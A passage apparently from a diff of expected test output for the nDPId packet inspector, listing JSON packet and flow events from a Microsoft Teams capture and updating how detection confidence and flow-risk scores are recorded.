{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041686611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01457{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01483{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00365{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041687412,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00168{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969}
 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}}
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"}
-00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01496{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041687611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
